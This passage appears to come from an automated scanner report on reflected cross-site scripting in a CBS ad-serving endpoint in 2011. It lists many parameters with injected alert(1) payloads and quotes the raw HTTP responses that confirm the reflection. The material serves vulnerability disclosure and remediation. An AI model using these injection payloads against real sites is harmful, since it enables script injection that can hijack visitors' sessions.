/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3Ac666a*/alert(1)//2a1c231c674&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload c1e34<a>4f3886b4828 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:13 GMT Server: Apache/2.2 Content-Length: 566 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:13 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3Ac1e34<a>4f3886b4828&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 64c59*/alert(1)//7c70951bddb was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:32 GMT Server: Apache/2.2 Content-Length: 1179 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:32 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=164c59*/alert(1)//7c70951bddb&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 97a0f<a>949e2a9c87d was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:38 GMT Server: Apache/2.2 Content-Length: 548 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:38 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=197a0f<a>949e2a9c87d&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE=' ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 88003*/alert(1)//d5fcbed443c was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:44 GMT Server: Apache/2.2 Content-Length: 1207 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:44 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=88003*/alert(1)//d5fcbed443c&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&c ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14ecd'%3balert(1)//bb8594cb98c was submitted in the PAGESTATE parameter. This input was echoed as 14ecd';alert(1)//bb8594cb98c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:42 GMT Server: Apache/2.2 Content-Length: 1209 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:42 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=14ecd'%3balert(1)//bb8594cb98c&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVA ...[SNIP]... sion%253de&ucat_rsi=%2526&pg=&t=2011.10.05.18.38.42/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='14ecd';alert(1)//bb8594cb98c';/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw4.cnet.com::1195522368 2011.10.05.18.38.42 *//* MAC T 0.2.4.5 */
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload e5a35<a>1c425d0a808 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:00 GMT Server: Apache/2.2 Content-Length: 632 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:00 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100e5a35<a>1c425d0a808&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='10' POS='100e5a35a1c425d0a808' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 6071b*/alert(1)//50be8f475ab was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:15 GMT Server: Apache/2.2 Content-Length: 1178 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:15 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20006071b*/alert(1)//50be8f475ab&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 6e347<a>bf23faea6ab was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:32 GMT Server: Apache/2.2 Content-Length: 565 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:32 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=20006e347<a>bf23faea6ab&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 71692<a>29ed69267d7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:45 GMT Server: Apache/2.2 Content-Length: 594 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16471692<a>29ed69267d7&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn= ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 5aa8d<a>e8de5c4623 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:03 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:03 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=15aa8d<a>e8de5c4623&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE=' ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 26862*/alert(1)//20981f91663 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:40 GMT Server: Apache/2.2 Content-Length: 1153 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:40 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=126862*/alert(1)//20981f91663&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
3.213. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload c5afb*/alert(1)//88c47602e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:14 GMT Server: Apache/2.2 Content-Length: 1153 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:14 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1&c5afb*/alert(1)//88c47602e89=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
3.214. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://mads.cbs.com
Path:
/mac-ad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7155b<a>cae8799240b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:45:27 GMT Server: Apache/2.2 Content-Length: 550 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:45:27 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=9174239&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1&7155b<a>cae8799240b=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] c13-ad-xw6.cnet.com::142677024 ...[SNIP]...
The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 44fb7<a>04b7ab431aa was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:17 GMT Server: Apache/2.2 Content-Length: 547 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:17 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=917423944fb7<a>04b7ab431aa&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKP ...[SNIP]...
The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload bbda2*/alert(1)//c035022bf81 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:11 GMT Server: Apache/2.2 Content-Length: 1154 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:11 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=e&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8IL05erE98AAAAVzE&x-cb=4810753bbda2*/alert(1)//c035022bf81&IREFER_HOST=google.com&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 40448<a>53b939a2f0b was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:06 GMT Server: Apache/2.2 Content-Length: 660 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:06 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=8040448<a>53b939a2f0b&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80404485393920' CNET-PTYPE='00' POS='100' NCAT='201:' CNET-PARTNER-ID='1' DVAR_PSID ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload b224c<a>eb340a43f1d was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:45:27 GMT Server: Apache/2.2 Content-Length: 554 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:45:27 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1b224c<a>eb340a43f1d&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1224340431' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw5.cnet.com::1461307712 2011.10.05 ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 4a683*/alert(1)//8e903a3711f was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:13 GMT Server: Apache/2.2 Content-Length: 1274 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:13 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=554a683*/alert(1)//8e903a3711f&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80 ...[SNIP]...
The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 982d2'%3balert(1)//8ab696c47cc was submitted in the BRAND parameter. This input was echoed as 982d2';alert(1)//8ab696c47cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:11 GMT Server: Apache/2.2 Content-Length: 1276 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:11 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55982d2'%3balert(1)//8ab696c47cc&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A ...[SNIP]... <img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&sg=1815&o=201%253a&h=cn&p=2&b=55982d2';alert(1)//8ab696c47cc&l=en_US&site=162&pt=2100&nd=201&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e15:4E8C4074883653&orh=google.com&ort=&oepartner=&epartner=&ppartner=&pdo ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 6bcf3<a>6095be1ad24 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:23 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:23 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=556bcf3<a>6095be1ad24&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beaco ...[SNIP]...
The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 244d4<script>alert(1)</script>f19cc161cc7 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:10 GMT Server: Apache/2.2 Content-Length: 4423 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:10 GMT
/* MAC ad */cbsiParseAdResponse({requestId:"1",divId:"cbsiAd15_100",segmentId:"547012",rotatorId:"13997",creativeSizeId:"3",isBlank:"0",seg_pageState:"5047",adHTML:"<!-- no overgif in ad style -->\n ...[SNIP]... )+\"|\"+-pr_d.getTimezoneOffset()/60;\nvar pr_postal=\"\";\nvar pr_data=\"\";\nvar pr_redir=\"http:%2F%2Fadlog%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D13997%26sg%3D547012%26o%3D201%253a%26h%3Dcn%26p%3D2%26b%3D55244d4<script>alert(1)</script>f19cc161cc7%26l%3Den_US%26site%3D162%26pt%3D2100%26nd%3D201%26pid%3D%26cid%3D%26pp%3D100%26e%3D%26rqid%3D01phx1-ad-e21:4E8CA2642770D%26orh%3Dgoogle.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dwww.cbsn ...[SNIP]...
The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 171e2<a>d67f2cd902d was submitted in the CELT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:21 GMT Server: Apache/2.2 Content-Length: 598 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: text/plain Expires: Wed, 05 Oct 2011 18:38:21 GMT
<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js171e2<a>d67f2cd902d&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFE ...[SNIP]...
The value of the CNET-PAGE-GUID request parameter is copied into the HTML document as plain text between tags. The payload b9697<a>f87bc0ab356 was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:13 GMT Server: Apache/2.2 Content-Length: 579 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:13 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155b9697<a>f87bc0ab356&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NO ...[SNIP]...
The value of the CNET-PAGE-GUID request parameter is copied into a JavaScript inline comment. The payload 1d836*/alert(1)//0a0c542a09d was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.
